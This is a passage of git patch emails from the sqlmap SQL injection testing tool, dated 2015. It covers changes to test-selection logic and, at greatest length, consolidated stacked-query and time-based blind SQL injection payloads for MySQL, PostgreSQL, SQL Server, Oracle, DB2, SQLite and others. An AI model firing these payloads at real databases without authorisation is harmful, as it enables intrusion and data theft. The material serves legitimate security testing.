             if "details" in test and "dbms" in test.details:
-                dbms = test.details.dbms
+                payloadDbms = test.details.dbms
             else:
-                dbms = None
+                payloadDbms = None
 
             # Skip tests if title, vector or DBMS is not included by the
             # given test filter
             if conf.testFilter and not any(conf.testFilter in str(item) or \
                re.search(conf.testFilter, str(item), re.I) for item in \
-               (test.title, test.vector, dbms)):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "its name/vector/dbms is not included by the given filter"
-                    logger.debug(debugMsg)
-                    continue
-
-            if dbms is not None:
-                # Skip DBMS-specific test if it does not match the
-                # previously identified DBMS (via DBMS-specific payload)
-                if injection.dbms is not None and not intersect(dbms, injection.dbms, True):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the back-end DBMS identified is "
-                    debugMsg += "%s" % injection.dbms
+               (test.title, test.vector, payloadDbms)):
+                    debugMsg = "skipping test '%s' because its " % title
+                    debugMsg += "name/vector/DBMS is not included by the given filter"
                     logger.debug(debugMsg)
                     continue
 
+            if payloadDbms is not None:
                 # Skip DBMS-specific test if it does not match the user's
                 # provided DBMS
-                if conf.dbms is not None and not intersect(dbms, conf.dbms, True):
+                if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
                     debugMsg = "skipping test '%s' because " % title
                     debugMsg += "the provided DBMS is %s" % conf.dbms
                     logger.debug(debugMsg)
                     continue
 
                 # Skip DBMS-specific test if it does not match the
-                # previously identified DBMS (via DBMS-specific error message)
-                if kb.reduceTests and not intersect(dbms, kb.reduceTests, True):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the parsed error message(s) showed "
-                    debugMsg += "that the back-end DBMS could be "
-                    debugMsg += "%s" % Format.getErrorParsedDBMSes()
+                # previously identified DBMS (via DBMS-specific payload)
+                if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
+                    debugMsg = "skipping test '%s' because the identified " % title
+                    debugMsg += "back-end DBMS is %s" % injection.dbms
                     logger.debug(debugMsg)
                     continue
 
-            if not (kb.extendTests and intersect(dbms, kb.extendTests)):
+                # Skip DBMS-specific test if it does not match the
+                # previously identified DBMS (via DBMS-specific error message)
+                if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
+                    debugMsg = "skipping test '%s' because the parsed " % title
+                    debugMsg += "error message(s) showed that the back-end DBMS "
+                    debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
+                    logger.debug(debugMsg)
+                    continue
+
+            # If the user did not decide to extend the tests to all
+            # DBMS-specific or the test payloads is not specific to the
+            # identified DBMS, then only test for it if both level and risk
+            # are below the corrisponding configuration's level and risk
+            # values
+            if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                 # Skip test if the risk is higher than the provided (or default)
                 # value
-                # Parse test's <risk>
-                if not conf.testFilter and test.risk > conf.risk:
+                if test.risk > conf.risk:
                     debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
                     debugMsg += "is higher than the provided (%d)" % conf.risk
                     logger.debug(debugMsg)
@@ -245,8 +248,7 @@ def checkSqlInjection(place, parameter, value):
 
                 # Skip test if the level is higher than the provided (or default)
                 # value
-                # Parse test's <level>
-                if not conf.testFilter and test.level > conf.level:
+                if test.level > conf.level:
                     debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                     debugMsg += "is higher than the provided (%d)" % conf.level
                     logger.debug(debugMsg)
@@ -279,7 +281,7 @@ def checkSqlInjection(place, parameter, value):
 
             # Force back-end DBMS according to the current test DBMS value
             # for proper payload unescaping
-            Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
+            Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
 
             # Parse test's <request>
             comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
@@ -813,12 +815,6 @@ def heuristicCheckSqlInjection(place, parameter):
         logger.debug(debugMsg)
         return None
 
-    if wasLastResponseDBMSError():
-        debugMsg = "heuristic check skipped because original page content "
-        debugMsg += "contains DBMS error"
-        logger.debug(debugMsg)
-        return None
-
     origValue = conf.paramDict[place][parameter]
     paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
     prefix = ""

From 260643241a9373c0bdb8bd0d68df26cf1e1a3449 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 27 Feb 2015 14:19:30 +0000
Subject: [PATCH 373/492] prioritized fingerprinted DBMS to error-based and
 user provided one

---
 lib/core/common.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index adba9fdbe..ab3b5310f 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -463,12 +463,12 @@ class Backend:
             dbms = Backend.getForcedDbms()
         elif Backend.getDbms() is not None:
             dbms = Backend.getDbms()
-        elif conf.get("dbms"):
-            dbms = conf.get("dbms")
-        elif Backend.getErrorParsedDBMSes():
-            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
         elif kb.get("injection") and kb.injection.dbms:
             dbms = unArrayizeValue(kb.injection.dbms)
+        elif Backend.getErrorParsedDBMSes():
+            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
+        elif conf.get("dbms"):
+            dbms = conf.get("dbms")
 
         return aliasToDbmsEnum(dbms)
 

From 8281fe48e5b484e4540678ecf5b193370d28a37e Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 1 Mar 2015 11:02:05 +0000
Subject: [PATCH 374/492] bug fix: test for boundaries with high levels if the
 test was extended

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 14aef2610..e680b479a 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -299,7 +299,7 @@ def checkSqlInjection(place, parameter, value):
                 # Skip boundary if the level is higher than the provided (or
                 # default) value
                 # Parse boundary's <level>
-                if boundary.level > conf.level:
+                if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                     continue
 
                 # Skip boundary if it does not match against test's <clause>

From 3f6c3b40dd977ae3dc6f37a3b5029a07d8907625 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 3 Mar 2015 14:37:36 +0100
Subject: [PATCH 375/492] Minor update (not overriding user given
 'Accept-Encoding' header value)

---
 lib/request/connect.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 82e7290f9..e2e7d2a18 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -332,7 +332,9 @@ class Connect(object):
             if HTTP_HEADER.ACCEPT not in headers:
                 headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
 
-            headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
+            if HTTP_HEADER.ACCEPT_ENCODING not in headers:
+                headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
+
             headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
 
             if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:

From 3347fc25ca74baee17a0b2388631c9b5252ecdcc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 3 Mar 2015 15:10:06 +0100
Subject: [PATCH 376/492] Fixes #1185

---
 lib/request/httpshandler.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index aa24eb474..7ea178160 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -53,7 +53,8 @@ class HTTPSConnection(httplib.HTTPSConnection):
                     break
                 else:
                     sock.close()
-            except (ssl.SSLError, socket.error), errMsg:
+            except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                self._tunnel_host = None
                 logger.debug("SSL connection error occurred ('%s')" % errMsg)
 
         if not success:

From 849ca3da3d735dc7bbf4b62f309a9d29245c8574 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Tue, 3 Mar 2015 14:18:53 +0000
Subject: [PATCH 377/492] added a newline

---
 xml/payloads/03_inline_query.xml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/xml/payloads/03_inline_query.xml b/xml/payloads/03_inline_query.xml
index e9d6e643a..b49d53834 100644
--- a/xml/payloads/03_inline_query.xml
+++ b/xml/payloads/03_inline_query.xml
@@ -102,6 +102,7 @@
             <dbms>SQLite</dbms>
         </details>
     </test>
+
     <test>
         <title>Firebird inline queries</title>
         <stype>3</stype>

From 37ca0a95f14218d3bcf78032f233d76da266418d Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Tue, 3 Mar 2015 14:19:36 +0000
Subject: [PATCH 378/492] consolidated stacked queries payloads - issue #1169

---
 xml/payloads/04_stacked_queries.xml | 408 ++++++++++++++++++++++++++--
 1 file changed, 381 insertions(+), 27 deletions(-)

diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
index 3c5a41869..45ce87a9f 100644
--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -2,6 +2,27 @@
 
 <root>
     <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
         <stype>4</stype>
@@ -23,15 +44,15 @@
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
+        <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
         <stype>4</stype>
-        <level>4</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
-            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -46,14 +67,13 @@
     <test>
         <title>MySQL &gt; 5.0.11 stacked queries</title>
         <stype>4</stype>
-        <level>1</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
             <payload>;SELECT SLEEP([SLEEPTIME])</payload>
-            <comment>-- </comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -65,7 +85,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
         <stype>4</stype>
         <level>2</level>
         <risk>2</risk>
@@ -74,7 +94,7 @@
         <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
             <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
         </request>
         <response>
             <time>[DELAYED]</time>
@@ -85,7 +105,26 @@
     </test>
 
     <test>
-        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
         <stype>4</stype>
         <level>1</level>
         <risk>1</risk>
@@ -106,7 +145,27 @@
     </test>
 
     <test>
-        <title>PostgreSQL stacked queries (heavy query)</title>
+        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query - comment)</title>
         <stype>4</stype>
         <level>2</level>
         <risk>2</risk>
@@ -126,9 +185,28 @@
     </test>
 
     <test>
-        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <title>PostgreSQL stacked queries (heavy query)</title>
         <stype>4</stype>
-        <level>4</level>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -148,7 +226,28 @@
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase stacked queries</title>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
         <stype>4</stype>
         <level>1</level>
         <risk>1</risk>
@@ -170,9 +269,30 @@
     </test>
 
     <test>
-        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <title>Microsoft SQL Server/Sybase stacked queries</title>
         <stype>4</stype>
-        <level>5</level>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -190,9 +310,28 @@
     </test>
 
     <test>
-        <title>Oracle stacked queries (heavy query)</title>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
         <stype>4</stype>
-        <level>5</level>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
@@ -209,6 +348,45 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
         <stype>4</stype>
@@ -219,6 +397,25 @@
         <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
         <request>
             <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -239,7 +436,6 @@
         <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
         <request>
             <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
-            <comment>--</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -250,7 +446,46 @@
     </test>
 
     <test>
-        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
+        <title>IBM DB2 stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
         <stype>4</stype>
         <level>3</level>
         <risk>2</risk>
@@ -271,9 +506,29 @@
     </test>
 
     <test>
-        <title>Firebird stacked queries (heavy query)</title>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
         <stype>4</stype>
-        <level>3</level>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
@@ -292,10 +547,69 @@
     </test>
     
     <test>
-        <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
+        <title>Firebird stacked queries (heavy query)</title>
         <stype>4</stype>
-        <level>3</level>
-        <risk>1</risk>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@@ -313,10 +627,30 @@
     </test>
     
     <test>
-        <title>HSQLDB &gt;= 2.0 stacked queries</title>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
         <stype>4</stype>
         <level>4</level>
-        <risk>1</risk>
+        <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
@@ -332,6 +666,26 @@
             <dbms_version>&gt;= 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of stacked queries tests -->
 </root>

From b2fca35c3684a8e02e8f444524dd33f652b04a62 Mon Sep 17 00:00:00 2001
From: "Bernardo Damele A. G." <bernardo.damele@gmail.com>
Date: Tue, 3 Mar 2015 14:22:20 +0000
Subject: [PATCH 379/492] consolidated some time-based blind payloads - issue
 #1169

---
 xml/payloads/05_time_blind.xml | 954 +++++++++++++++++++++------------
 1 file changed, 599 insertions(+), 355 deletions(-)

diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 2cec7931e..95a6f5160 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -1,7 +1,7 @@
 <?xml version="1.0" encoding="UTF-8"?>
 
 <root>
-    <!-- AND time-based blind tests -->
+    <!-- Time-based blind tests -->
     <test>
         <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
         <stype>5</stype>
@@ -22,10 +22,30 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
